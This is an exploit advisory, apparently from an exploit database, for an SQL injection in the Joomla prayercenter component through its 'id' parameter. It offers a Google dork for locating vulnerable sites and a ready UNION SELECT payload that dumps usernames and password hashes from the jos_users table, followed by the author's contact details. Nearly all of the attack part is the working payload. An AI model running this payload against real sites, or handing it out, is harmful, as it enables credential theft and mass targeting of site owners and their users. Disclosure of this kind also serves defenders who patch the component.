# Exploit Title: Joomla Component prayercenter 'id' SQL Injection Vulnerability
# Date: 2020-05-09
# Author: Milad Karimi
# Software Link:
# Version: 1.0
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_prayercenter
index2.php?option=com_prayercenter&task=view_request&id={SQL}
Example:
http://[site]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************